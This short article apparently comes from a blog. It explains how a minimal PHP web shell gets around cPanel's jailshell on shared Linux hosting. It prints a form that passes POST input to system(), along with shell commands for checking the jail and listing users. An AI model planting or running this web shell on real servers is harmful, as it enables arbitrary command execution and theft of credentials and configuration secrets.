cPanel's jailshell limits the access of shared Linux web hosting users. The jailshell makes it harder for malicious actors to access sensitive information or cause harm to the server. However, with some simple HTML and PHP codes, a web-based shell can be created that bypasses the restrictions of the jailshell environment. Running the following command at the terminal if you have SSH access to your cPanel account confirms that you're using a jailshell.

$ echo $SHELL

People with malicious intent can bypass the jailshell and access sensitive information such as passwords and other confidential information stored in the user's home directories or web application configuration files. Having said that, a jailshell places every user in their separate environment without access to other users in the same system.

$ ls /home/ | wc -l

You can place the following code (named jailshell.php in the example) in your web directory and send commands to be executed in the query parameter, such as;

    <p>Enter command:
      <form action="jailshell.php" method=post>
      <input type=text name=command>
      <input type=submit name=submit>
      <?php system ($_POST['command']); ?>

The whoami command will be executed by PHP which is not confined under jailshell.

Most hosting providers already disable system() and other similar functions in their PHP implementation to fix this vulnerability.

Discuss the article:

Comment anonymously. Login not required.